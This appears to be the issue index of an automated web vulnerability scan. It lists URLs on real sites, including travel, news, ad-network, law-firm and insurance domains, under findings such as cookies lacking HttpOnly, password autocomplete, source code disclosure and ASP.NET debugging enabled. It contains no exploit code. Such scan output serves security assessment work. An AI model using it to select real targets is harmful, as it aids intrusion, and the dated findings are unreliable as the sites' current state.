16. Cookie scoped to parent domain

16.1. http://api.twitter.com/1/statuses/user_timeline.json

16.2. http://www.expedia.com/Hotels

16.3. http://www.lbmc.com/about_us

16.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

16.5. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp

16.6. http://ad.adlegend.com/jscript

16.7. http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5

16.8. http://adfarm.mediaplex.com/ad/js/15368-110724-22624-68

16.9. http://adopt.imiclk.com/emb/q

16.10. http://ads.adonion.com/serving/tracking_id.php

16.11. http://ads.revsci.net/adserver/ako

16.12. http://ads.revsci.net/adserver/ako

16.13. http://ak1.abmr.net/is/media.expedia.com

16.14. http://altfarm.mediaplex.com/ad/js/16228-124632-16454-0

16.15. http://ar.voicefive.com/b/wc_beacon.pli

16.16. http://ar.voicefive.com/bmx3/broker.pli

16.17. http://as.casalemedia.com/j

16.18. http://b.scorecardresearch.com/b

16.19. http://b.scorecardresearch.com/r

16.20. http://b.voicefive.com/b

16.21. http://bh.contextweb.com/bh/set.aspx

16.22. http://bid.openx.net/json

16.23. http://bidder.mathtag.com/iframe/notify

16.24. http://c7.zedo.com/bar/v16-406/c5/jsc/gl.js

16.25. http://cf.addthis.com/red/p.json

16.26. http://dce.sapha.com/logging.php

16.27. http://dce.sapha.com/logging.php

16.28. http://ib.adnxs.com/getuidnb

16.29. http://ib.adnxs.com/pxj

16.30. http://ib.adnxs.com/seg

16.31. http://id.google.com/verify/EAAAADcwJcMJLjnWquVxOtkmYRg.gif

16.32. http://id.google.com/verify/EAAAAG_sa57vRYQmlm0gFHNkdu4.gif

16.33. http://id.google.com/verify/EAAAANTvF5afxBqT02sP1JEM_fQ.gif

16.34. http://id.google.com/verify/EAAAAOVhf5VMyylQCd7Y4m9Qwq4.gif

16.35. http://image.providesupport.com/js/advancedaccess/safe-monitor.js

16.36. http://image.providesupport.com/js/charlesw/safe-standard.js

16.37. http://int.teracent.net/tase/int

16.38. http://leadback.advertising.com/adcedge/lb

16.39. http://m.adnxs.com/msftcookiehandler

16.40. http://media.expedia.com/media/content/expus/graphics/home/wiz/wizard_booking_image.gif

16.41. http://media.expedia.com/media/content/expus/graphics/launch/home/100824_newhp_wizard_topbtm.gif

16.42. http://media.fastclick.net/w/tre

16.43. http://meter-svc.nytimes.com/meter.js

16.44. https://meter-svc.nytimes.com/meter.js

16.45. http://oimg.nbcuni.com/b/ss/nbcuglobal,nbculimdivisionprod,nbculimhartfordprod/1/H.20.3/s75526399014052

16.46. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s91449721802491

16.47. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif

16.48. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif

16.49. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif

16.50. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif

16.51. http://pix04.revsci.net/I10985/b3/0/3/1003161/1437265.js

16.52. http://pix04.revsci.net/I10985/b3/0/3/1003161/696734288.js

16.53. http://segment-pixel.invitemedia.com/pixel

16.54. http://syndication.mmismm.com/mmtnt.php

16.55. http://tags.bluekai.com/site/2576

16.56. http://tags.bluekai.com/site/2751

16.57. http://tags.bluekai.com/site/2753

16.58. http://tags.bluekai.com/site/2948

16.59. http://tags.bluekai.com/site/38

16.60. http://tags.bluekai.com/site/450

16.61. http://va.px.invitemedia.com/pixel

16.62. http://www.expedia.com/default.asp

16.63. http://www.expedia.com/pub/agent.dll

16.64. https://www.expedia.com/pub/agent.dll

17. Cookie without HttpOnly flag set

17.1. https://broker.gotoassist.com/h/lbmc

17.2. http://dominionenterprises.com/

17.3. http://hmficweb.hinghammutual.com/billing_view/

17.4. http://hmficweb.hinghammutual.com/billing_view/billingview.asp

17.5. http://learn.bridgefront.com/sendpassword

17.6. http://login.vindicosuite.com/

17.7. http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp

17.8. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp

17.9. http://login.vindicosuite.com/default.asp

17.10. http://login.vindicosuite.com/vindico_dynamic.asp

17.11. http://poll.websitegear.com/compactpoll.asp

17.12. http://poll.websitegear.com/compactpoll.asp

17.13. http://sales.liveperson.net/visitor/addons/deploy.asp

17.14. https://secure.trust-guard.com/

17.15. https://secure.trust-guard.com/ResetPassword.php

17.16. https://secure.trust-guard.com/index.php

17.17. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

17.18. http://support.expedia.com/app/answers/list/

17.19. http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F

17.20. http://support.expedia.com/ci/ajaxRequest/getReportData

17.21. http://www.advisorsquare.com/advdev/calculators/content.asp

17.22. http://www.advisorsquare.com/design_gallery/Flash/BB12_bg.gif

17.23. http://www.advisorsquare.com/design_gallery/Flash/BU13Flash_banner_background.gif

17.24. http://www.advisorsquare.com/design_gallery/Flash/BU14Flash_banner_background.gif

17.25. http://www.advisorsquare.com/design_gallery/Flash/BUP18Flash_banner_background.gif

17.26. http://www.advisorsquare.com/design_gallery/Flash/CS15Flash_banner_background.gif

17.27. http://www.advisorsquare.com/design_gallery/Flash/CS18_bg.gif

17.28. http://www.advisorsquare.com/design_gallery/Flash/CS20_bg.gif

17.29. http://www.advisorsquare.com/design_gallery/Flash/GA14_bg.gif

17.30. http://www.advisorsquare.com/design_gallery/Flash/GA15_bg.gif

17.31. http://www.advisorsquare.com/design_gallery/Flash/NL12_bg.gif

17.32. http://www.advisorsquare.com/design_gallery/fsplash/background.gif

17.33. http://www.advisorsquare.com/design_gallery/limited/SE3_background.gif

17.34. http://www.advisorsquare.com/design_gallery/welcome/grayStripe.gif

17.35. http://www.advisorsquare.com/design_gallery/welcome/transpx.gif

17.36. http://www.advisorsquare.com/images/business.gif

17.37. http://www.advisorsquare.com/images/business_over.gif

17.38. http://www.advisorsquare.com/images/individual.gif

17.39. http://www.advisorsquare.com/images/individual_over.gif

17.40. http://www.advisorsquare.com/images/view1.gif

17.41. http://www.advisorsquare.com/images/view_over1.gif

17.42. http://www.advisorsquare.com/new/BrochureLevel/transPx.gif

17.43. http://www.advisorsquare.com/new/BusinessLevel/FA09BannerBG.jpg

17.44. http://www.advisorsquare.com/new/BusinessLevel/grayStripe.gif

17.45. http://www.advisorsquare.com/new/BusinessLevel/transPx.gif

17.46. http://www.advisorsquare.com/new/asframeless02/content.asp

17.47. http://www.advisorsquare.com/new/asle04/content.asp

17.48. http://www.advisorsquare.com/new/asle04/grayStripe.gif

17.49. http://www.advisorsquare.com/new/asle04/staff_pict1.jpg

17.50. http://www.advisorsquare.com/new/asle04/staff_pict2.jpg

17.51. http://www.advisorsquare.com/new/asle05/content.asp

17.52. http://www.advisorsquare.com/new/asle05/transPx.gif

17.53. http://www.advisorsquare.com/new/css/menu.css

17.54. http://www.advisorsquare.com/new/images/banner_slogan1.jpg

17.55. http://www.advisorsquare.com/new/images/content_bg_repeat.jpg

17.56. http://www.advisorsquare.com/new/js/jquery-1.4.4.min.js.txt

17.57. http://www.advisorsquare.com/new/js/menu.js.txt

17.58. http://www.advisorsquare.com/new/js/preload.js.txt

17.59. http://www.advisorsquare.com/research/content.asp

17.60. http://www.advisorsquare.com/useradmin/Authenticate.asp

17.61. http://www.advisorsquare.com/websites1/PR/images/dotclear.gif

17.62. http://www.advisorsquare.com/websites1/Web/img/dotclear.gif

17.63. http://www.brownrudnick.com/nr/alertsArchv.asp

17.64. http://www.brownrudnick.com/nr/alertsArchv.asp

17.65. http://www.brownrudnick.com/nr/articlesindv.asp

17.66. http://www.dominionenterprises.com/main/do/Advertiser_Agreement

17.67. http://www.dominionenterprises.com/main/do/Careers

17.68. http://www.eneighborhoods.com/

17.69. http://www.expedia.com/Hotels

17.70. http://www.ezflexplan.com/lbmc/

17.71. http://www.ezflexplan.com/navigation/menu.asp

17.72. http://www.gofileroom.com/SessionRelease.asp

17.73. http://www.gofileroom.com/lbmc/

17.74. http://www.hunton.com/news/uniGC.aspx

17.75. http://www.hunton.com/professionals/uniGC.aspx

17.76. http://www.hunton.com/services/uniGC.aspx

17.77. http://www.lbmc.com/about_us

17.78. http://www.nextadvisor.com/favicon.ico

17.79. http://www.socialfollow.com/

17.80. http://www.socialfollow.com/blog/

17.81. http://www.socialfollow.com/login.php

17.82. https://www.taxnotebook.com/Login/PopupMessage.aspx

17.83. https://www.taxnotebook.com/Login/TNLogin.aspx

17.84. https://www.taxnotebook.com/tnstart.asp

17.85. http://www.twinspiresclub.com/members/join

17.86. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

17.87. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp

17.88. http://ad.adlegend.com/jscript

17.89. http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5

17.90. http://ad.yieldmanager.com/iframe3

17.91. http://ad.yieldmanager.com/imp

17.92. http://ad.yieldmanager.com/pixel

17.93. http://adfarm.mediaplex.com/ad/js/15368-110724-22624-68

17.94. http://adopt.imiclk.com/emb/q

17.95. http://ads.adonion.com/serving/tracking_id.php

17.96. http://ads.allatsea.net/www/delivery/lg.php

17.97. http://ads.allatsea.net/www/delivery/spc.php

17.98. http://ads.revsci.net/adserver/ako

17.99. http://ads.revsci.net/adserver/ako

17.100. http://ads.undertone.com/ajs.php

17.101. http://ads.undertone.com/fc.php

17.102. http://ads.undertone.com/l

17.103. http://adsfac.us/ag.asp

17.104. http://ak1.abmr.net/is/media.expedia.com

17.105. http://altfarm.mediaplex.com/ad/js/16228-124632-16454-0

17.106. http://api.twitter.com/1/statuses/user_timeline.json

17.107. http://ar.voicefive.com/b/wc_beacon.pli

17.108. http://ar.voicefive.com/bmx3/broker.pli

17.109. http://as.casalemedia.com/j

17.110. http://b.scorecardresearch.com/b

17.111. http://b.scorecardresearch.com/r

17.112. http://b.voicefive.com/b

17.113. http://bh.contextweb.com/bh/set.aspx

17.114. http://bid.openx.net/json

17.115. http://bidder.mathtag.com/iframe/notify

17.116. http://c7.zedo.com/bar/v16-406/c5/jsc/gl.js

17.117. http://cf.addthis.com/red/p.json

17.118. http://dce.sapha.com/logging.php

17.119. http://dce.sapha.com/logging.php

17.120. http://expedia.com/

17.121. http://help.tagged.com/

17.122. http://image.providesupport.com/js/advancedaccess/safe-monitor.js

17.123. http://image.providesupport.com/js/charlesw/safe-standard.js

17.124. http://int.teracent.net/tase/int

17.125. http://leadback.advertising.com/adcedge/lb

17.126. http://media.expedia.com/media/content/expus/graphics/home/wiz/wizard_booking_image.gif

17.127. http://media.expedia.com/media/content/expus/graphics/launch/home/100824_newhp_wizard_topbtm.gif

17.128. http://media.fastclick.net/w/tre

17.129. http://meter-svc.nytimes.com/meter.js

17.130. https://meter-svc.nytimes.com/meter.js

17.131. http://oimg.nbcuni.com/b/ss/nbcuglobal,nbculimdivisionprod,nbculimhartfordprod/1/H.20.3/s75526399014052

17.132. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s91449721802491

17.133. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif

17.134. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif

17.135. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif

17.136. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif

17.137. http://pix04.revsci.net/I10985/b3/0/3/1003161/1437265.js

17.138. http://pix04.revsci.net/I10985/b3/0/3/1003161/696734288.js

17.139. http://sales.liveperson.net/hc/56727252/

17.140. http://segment-pixel.invitemedia.com/pixel

17.141. http://store.kentuckyderby.com/

17.142. http://store.kentuckyderby.com/cart.php

17.143. http://syndication.mmismm.com/mmtnt.php

17.144. http://tags.bluekai.com/site/2576

17.145. http://tags.bluekai.com/site/2751

17.146. http://tags.bluekai.com/site/2753

17.147. http://tags.bluekai.com/site/2948

17.148. http://tags.bluekai.com/site/38

17.149. http://tags.bluekai.com/site/450

17.150. http://va.px.invitemedia.com/pixel

17.151. http://www.dhmiservices.com/ClickContact/js.ashx

17.152. http://www.dhmiservices.com/ImageHandler.ashx

17.153. http://www.dhmiservices.com/favicon.ico

17.154. http://www.eneighborhoods.com/common/s_code.js

17.155. http://www.eneighborhoods.com/css/basic.css

17.156. http://www.eneighborhoods.com/favicon.ico

17.157. http://www.eneighborhoods.com/images/about_contact_us_menu_over.jpg

17.158. http://www.eneighborhoods.com/images/about_contact_us_menu_up.jpg

17.159. http://www.eneighborhoods.com/images/agent_services_menu_over.jpg

17.160. http://www.eneighborhoods.com/images/agent_services_menu_up.jpg

17.161. http://www.eneighborhoods.com/images/bullet.gif

17.162. http://www.eneighborhoods.com/images/cmls.gif

17.163. http://www.eneighborhoods.com/images/dominion.gif

17.164. http://www.eneighborhoods.com/images/en_logo.gif

17.165. http://www.eneighborhoods.com/images/en_logo_white.jpg

17.166. http://www.eneighborhoods.com/images/enterprise_solutions_menu_over.jpg

17.167. http://www.eneighborhoods.com/images/enterprise_solutions_menu_up.jpg

17.168. http://www.eneighborhoods.com/images/footer_menu_bg.jpg

17.169. http://www.eneighborhoods.com/images/free_resources_menu_over.jpg

17.170. http://www.eneighborhoods.com/images/free_resources_menu_up.jpg

17.171. http://www.eneighborhoods.com/images/getstarted_button.gif

17.172. http://www.eneighborhoods.com/images/header_bckgd.jpg

17.173. http://www.eneighborhoods.com/images/home_image.jpg

17.174. http://www.eneighborhoods.com/images/homes_logo.jpg

17.175. http://www.eneighborhoods.com/images/menu_bg_new.jpg

17.176. http://www.eneighborhoods.com/images/spacer.gif

17.177. http://www.eneighborhoods.com/images/support_training_menus_over.jpg

17.178. http://www.eneighborhoods.com/images/support_training_menus_up.jpg

17.179. http://www.eneighborhoods.com/images/webinar_link.jpg

17.180. http://www.eneighborhoods.com/login_form.asp

17.181. http://www.eneighborhoods.com/main.css

17.182. http://www.eneighborhoods.com/menu/homepage/menu.css

17.183. http://www.eneighborhoods.com/menu/menu.css

17.184. http://www.eneighborhoods.com/menu/mm_css_menu.js

17.185. http://www.eneighborhoods.com/menumachine/core/w3cdom.js

17.186. http://www.eneighborhoods.com/menumachine/eneighborhoodsfooter2/menuspecs.js

17.187. http://www.eneighborhoods.com/menumachine/eneighborhoodshomemenu2/menuspecs.js

17.188. http://www.eneighborhoods.com/menumachine/menumachine2.js

17.189. http://www.expedia.com/default.asp

17.190. http://www.expedia.com/pub/agent.dll

17.191. https://www.expedia.com/pub/agent.dll

17.192. http://www.gofileroom.com/includes/css/main.css

17.193. http://www.gofileroom.com/includes/js/GFRAJAX.js

17.194. http://www.gofileroom.com/includes/js/login.js

17.195. http://www.gofileroom.com/includes/js/loginfunctions.js

17.196. http://www.gofileroom.com/lbmc/css/DocAudit.css

17.197. http://www.gofileroom.com/lbmc/images/LBMC%20horizontal%20blue.jpg

17.198. http://www.gofileroom.com/lbmc/images/angle3a.gif

17.199. http://www.gofileroom.com/lbmc/images/angle3b.gif

17.200. http://www.gofileroom.com/lbmc/images/button2A.gif

17.201. http://www.gofileroom.com/lbmc/images/check.gif

17.202. http://www.gofileroom.com/lbmc/images/dottedlinevert2.gif

17.203. http://www.gofileroom.com/lbmc/images/s-key.gif

17.204. http://www.gofileroom.com/lbmc/images/softwareInstalled.gif

17.205. http://www.gofileroom.com/lbmc/images/spacer.gif

17.206. http://www.gofileroom.com/lbmc/images/version.gif

17.207. https://www.gofileroom.com/lbmc

17.208. http://www.hunton.com/

17.209. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif

17.210. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif

17.211. http://www.hunton.com/FCWSite/Include/autocomplete.css

17.212. http://www.hunton.com/FCWSite/Include/footer.css

17.213. http://www.hunton.com/FCWSite/Include/footer_web.css

17.214. http://www.hunton.com/FCWSite/Include/general_web.css

17.215. http://www.hunton.com/FCWSite/Include/header.css

17.216. http://www.hunton.com/FCWSite/Include/header_web.css

17.217. http://www.hunton.com/FCWSite/Include/menu.js

17.218. http://www.hunton.com/FCWSite/Include/packetbuilder.css

17.219. http://www.hunton.com/FCWSite/Include/pdf.css

17.220. http://www.hunton.com/FCWSite/Include/print.css

17.221. http://www.hunton.com/FCWSite/Include/spamproof.aspx

17.222. http://www.hunton.com/FCWSite/Include/spamproof.js

17.223. http://www.hunton.com/FCWSite/img/Hunton/arrow_green_onblackbg.gif

17.224. http://www.hunton.com/FCWSite/img/Hunton/bullet.gif

17.225. http://www.hunton.com/FCWSite/img/Hunton/home_tile.gif

17.226. http://www.hunton.com/FCWSite/img/Hunton/middle/arrow_indicator.png

17.227. http://www.hunton.com/FCWSite/img/Hunton/middle/body_wide.png

17.228. http://www.hunton.com/FCWSite/img/Hunton/middle/bottom_wide.png

17.229. http://www.hunton.com/FCWSite/img/Hunton/middle/top_wide.png

17.230. http://www.hunton.com/_xpressHighlights/highlights_image.aspx

17.231. http://www.hunton.com/aboutus/uniGC.aspx

17.232. http://www.hunton.com/ajaxBCard.aspx

17.233. http://www.hunton.com/alan_kailer/

17.234. http://www.hunton.com/contactus/

17.235. http://www.hunton.com/dallas-united-states-of-america/

17.236. http://www.hunton.com/disclaimer/uniGC.aspx

17.237. http://www.hunton.com/emailthispage/emdisclaimer.aspx

17.238. http://www.hunton.com/files/ImageControl/3ae71a66-38dd-46b3-b631-5a5623944fc2/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/ico_share.gif

17.239. http://www.hunton.com/files/ImageControl/56db1668-7f9d-4143-ab08-061242989a1f/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/News-and-Events.jpg

17.240. http://www.hunton.com/files/ImageControl/843a0930-99dd-4266-9d90-55e4d3cb4a74/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/ico_rss.png

17.241. http://www.hunton.com/files/ImageControl/ae2e582d-08db-47f0-9896-42087325427a/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/logo_print.gif

17.242. http://www.hunton.com/files/ImageControl/c50db0f0-85f0-4d2a-801e-5c7b6ca5855a/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/ico_email.gif

17.243. http://www.hunton.com/files/ImageControl/db4a4e6b-0e0c-4e10-ad7f-3f8a91fd6ef1/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/logo.gif

17.244. http://www.hunton.com/files/ImageControl/de90a91d-23b9-4df4-84f3-06e0d99ae915/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/News_Events.jpg

17.245. http://www.hunton.com/files/Publication/b1c22611-ccc5-4c3b-aa62-a5f4667f2a5f/Presentation/PublicationAttachment/b83cdb36-b286-49eb-852d-ab18526b1335/martinez_edit9.mp4

17.246. http://www.hunton.com/include_common/NetInsight/ntpagetag.gif

17.247. http://www.hunton.com/include_common/NetInsight/ntpagetag.js

17.248. http://www.hunton.com/include_common/jQuery/dimensions.js

17.249. http://www.hunton.com/include_common/jQuery/html5media.min.js

17.250. http://www.hunton.com/include_common/jQuery/html5mediaConfig.js

17.251. http://www.hunton.com/include_common/jQuery/html5mediaOverlay.js

17.252. http://www.hunton.com/include_common/jQuery/jqDnR.js

17.253. http://www.hunton.com/include_common/jQuery/jquery.ajaxQueue.1.3.js

17.254. http://www.hunton.com/include_common/jQuery/jquery.autocomplete.min.js

17.255. http://www.hunton.com/include_common/jQuery/jquery.bgiframe.min.js

17.256. http://www.hunton.com/include_common/jQuery/jquery.min.js

17.257. http://www.hunton.com/include_common/jQuery/jquery.tools.1.2.5.min.js

17.258. http://www.hunton.com/include_common/jQuery/packetbuilder.js

17.259. http://www.hunton.com/include_common/jQuery/packetviewer.js

17.260. http://www.hunton.com/include_common/jQuery/ui.core.min.js

17.261. http://www.hunton.com/include_common/jQuery/ui.draggable.min.js

17.262. http://www.hunton.com/include_common/jQuery/ui.droppable.min.js

17.263. http://www.hunton.com/load.vcf

17.264. http://www.hunton.com/private_wealth_advisors/

17.265. http://www.hunton.com/sitemap/uniGC.aspx

17.266. http://www.millerwelds.com/financing/index.php

17.267. http://www.twinspiresclub.com/common/print.css

17.268. http://www.twinspiresclub.com/common/sifr.js

17.269. http://www.twinspiresclub.com/common/twinspiresclub.css

17.270. http://www.twinspiresclub.com/common/twinspiresclub.js

17.271. http://www.twinspiresclub.com/images/home/signup.gif

17.272. http://www.twinspiresclub.com/images/home/who_join.gif

17.273. http://www.twinspiresclub.com/images/home/why_join.gif

17.274. http://www.twinspiresclub.com/images/login_signin.gif

17.275. http://www.twinspiresclub.com/images/main_bg.gif

17.276. http://www.twinspiresclub.com/images/main_footer_bg.gif

17.277. http://www.twinspiresclub.com/images/nav/about.gif

17.278. http://www.twinspiresclub.com/images/nav/contact.gif

17.279. http://www.twinspiresclub.com/images/nav/join.gif

17.280. http://www.twinspiresclub.com/images/nav/news.gif

17.281. http://www.twinspiresclub.com/images/nav/twin_spires_club.gif

17.282. http://www.twinspiresclub.com/images/nav/vip.gif

17.283. http://www.twinspiresclub.com/images/player_reward_program.gif

17.284. http://www.twinspiresclub.com/images/side_arrow.gif

17.285. http://www.twinspiresclub.com/images/signup_message.gif

17.286. http://www.twinspiresclub.com/images/tools/bigger.gif

17.287. http://www.twinspiresclub.com/images/tools/biggest.gif

17.288. http://www.twinspiresclub.com/images/tools/bookmark.gif

17.289. http://www.twinspiresclub.com/images/tools/email.gif

17.290. http://www.twinspiresclub.com/images/tools/normal.gif

17.291. http://www.twinspiresclub.com/images/tools/print.gif

18. Password field with autocomplete enabled

18.1. http://hmficweb.hinghammutual.com/

18.2. http://hmficweb.hinghammutual.com/default.aspx

18.3. http://hmficweb.hinghammutual.com/reglogin.aspx

18.4. http://hmficweb.hinghammutual.com/reglogin.aspx

18.5. http://hmficweb.hinghammutual.com/reglogin.aspx

18.6. http://login.vindicosuite.com/

18.7. http://login.vindicosuite.com/default.asp

18.8. https://mosaicsecurity.com/products/1919-pci-scan-annual

18.9. https://myaccount.nytimes.com/auth/login

18.10. https://secure.trust-guard.com/

18.11. https://secure.trust-guard.com/index.php

18.12. http://www.advisorsquare.com/useradmin/Authenticate.asp

18.13. http://www.alumniconnections.com/alumni_members/mylisting/index.html

18.14. http://www.eneighborhoods.com/login_form.asp

18.15. https://www.expedia.com/pub/agent.dll

18.16. https://www.expedia.com/pub/agent.dll

18.17. http://www.gofileroom.com/lbmc/

18.18. https://www.gofileroom.com/lbmc/Default.asp

18.19. http://www.horseracingnation.com/polls/current/kentucky_derby_2011_contenders

18.20. http://www.horseracingnation.com/probables/probables.aspx

18.21. http://www.lbmc.com/user

18.22. http://www.nbcconnecticut.com/

18.23. http://www.nbcconnecticut.com/

18.24. http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html

18.25. http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html

18.26. http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html

18.27. http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html

18.28. http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html

18.29. http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html

18.30. http://www.resiteonline.com/

18.31. http://www.socialfollow.com/

18.32. http://www.socialfollow.com/

18.33. http://www.socialfollow.com/blog/

18.34. http://www.socialfollow.com/login.php

18.35. http://www.socialfollow.com/login.php

18.36. https://www.taxnotebook.com/Login/ChangePwd.aspx

18.37. http://www.twinspiresclub.com/members/join

19. Source code disclosure

19.1. http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

19.2. http://js.nyt.com/js/app/timespeople/activities/1.6/activities.build.js

19.3. http://js.nyt.com/js/app/timespeople/toolbar/1.7/toolbar.build.min.js

19.4. http://js.nyt.com/js2/build/homepage/top.js

19.5. http://js.nyt.com/js2/build/sitewide/sitewide.js

19.6. https://myaccount.nytimes.com/gst/forgot

19.7. https://myaccount.nytimes.com/js/adx/googleads.js

19.8. https://myaccount.nytimes.com/js/app/lib/NYTD/0.0.1/template.js

19.9. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

20. ASP.NET debugging enabled

20.1. http://4qinvite.4q.iperceptions.com/Default.aspx

20.2. http://www.dhmiservices.com/Default.aspx

21. Referer-dependent response

21.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

21.2. http://480-adver-view.c3metrics.com/v.js

21.3. http://ad.yieldmanager.com/imp

21.4. http://depot.activalive.com/app/deployment.php

21.5. http://www.expedia.com/daily/service/default.asp

22. Cross-domain POST

22.1. http://hmficweb.hinghammutual.com/

22.2. http://hmficweb.hinghammutual.com/default.aspx

22.3. http://www.resiteonline.com/

22.4. http://www.resiteonline.com/

23. Cross-domain Referer leakage

23.1. http://ab158636.servedbyadbutler.com/adserve/

23.2. http://ab158636.servedbyadbutler.com/adserve/

23.3. http://ab158636.servedbyadbutler.com/adserve/

23.4. http://ab158636.servedbyadbutler.com/adserve/

23.5. http://ab158636.servedbyadbutler.com/adserve/

23.6. http://ab158636.servedbyadbutler.com/adserve/

23.7. http://ab158636.servedbyadbutler.com/adserve/

23.8. http://ab158636.servedbyadbutler.com/adserve/

23.9. http://ab158636.servedbyadbutler.com/adserve/

23.10. http://ad.doubleclick.net/adi/N4538.132530.MICROSOFTONLINEINC1/B2304017.8

23.11. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2

23.12. http://ad.doubleclick.net/adj/scmag.hmktus/sc

23.13. http://ad.doubleclick.net/adj/scmag.hmktus/sc

23.14. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other

23.15. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other

23.16. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other

23.17. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other

23.18. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other

23.19. http://ad.yieldmanager.com/iframe3

23.20. http://ad.yieldmanager.com/iframe3

23.21. http://adopt.imiclk.com/emb/q

23.22. http://ads.adonion.com/serving/showbanner.php

23.23. http://ads.betfair.com/ad.aspx

23.24. http://ads.betfair.com/ad.aspx

23.25. http://ads.betfair.com/ad.aspx

23.26. http://ads.betfair.com/ad.aspx

23.27. http://ads.betfair.com/ad.aspx

23.28. http://ads.betfair.com/ad.aspx

23.29. http://allatsea.net/directclassifieds.php

23.30. http://apps.sapha.com/appshandler.php

23.31. http://as.casalemedia.com/j

23.32. http://b.rad.msn.com/ADSAdClient31.dll

23.33. http://bidder.mathtag.com/iframe/notify

23.34. http://creativeby1.unicast.com/assets/A372/N26104/M13191/P17/Q71239/script_300_250.js

23.35. http://dinclinx.com/

23.36. http://dinclinx.com/

23.37. http://fls.doubleclick.net/activityi

23.38. http://fls.doubleclick.net/activityi

23.39. http://fls.doubleclick.net/activityi

23.40. http://fls.doubleclick.net/activityi

23.41. http://googleads.g.doubleclick.net/pagead/ads

23.42. http://googleads.g.doubleclick.net/pagead/ads

23.43. http://googleads.g.doubleclick.net/pagead/ads

23.44. http://googleads.g.doubleclick.net/pagead/ads

23.45. http://googleads.g.doubleclick.net/pagead/ads

23.46. http://googleads.g.doubleclick.net/pagead/ads

23.47. http://googleads.g.doubleclick.net/pagead/ads

23.48. http://googleads.g.doubleclick.net/pagead/ads

23.49. http://googleads.g.doubleclick.net/pagead/ads

23.50. http://googleads.g.doubleclick.net/pagead/ads

23.51. http://googleads.g.doubleclick.net/pagead/ads

23.52. http://googleads.g.doubleclick.net/pagead/ads

23.53. http://googleads.g.doubleclick.net/pagead/ads

23.54. http://googleads.g.doubleclick.net/pagead/ads

23.55. http://googleads.g.doubleclick.net/pagead/ads

23.56. http://googleads.g.doubleclick.net/pagead/ads

23.57. http://googleads.g.doubleclick.net/pagead/ads

23.58. http://googleads.g.doubleclick.net/pagead/ads

23.59. http://googleads.g.doubleclick.net/pagead/ads

23.60. http://googleads.g.doubleclick.net/pagead/ads

23.61. http://googleads.g.doubleclick.net/pagead/ads

23.62. http://googleads.g.doubleclick.net/pagead/ads

23.63. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js

23.64. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js

23.65. http://img.mediaplex.com/content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js

23.66. http://img.mediaplex.com/content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js

23.67. http://img.mediaplex.com/content/0/15368/110724/UK_HORSE_RACING_JUMP_FEED_160x600.js

23.68. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js

23.69. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js

23.70. http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com/gadgets/ifr

23.71. http://iv.doubleclick.net/adi/nbcu.lim.har/news-local-article

23.72. http://iv.doubleclick.net/adi/nbcu.lim.har/pid_ap_news-politics-article

23.73. http://iv.doubleclick.net/adj/nbcu.lim.har/hp-index

23.74. http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com/gadgets/ifr

23.75. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr

23.76. http://store.kentuckyderby.com/login.php

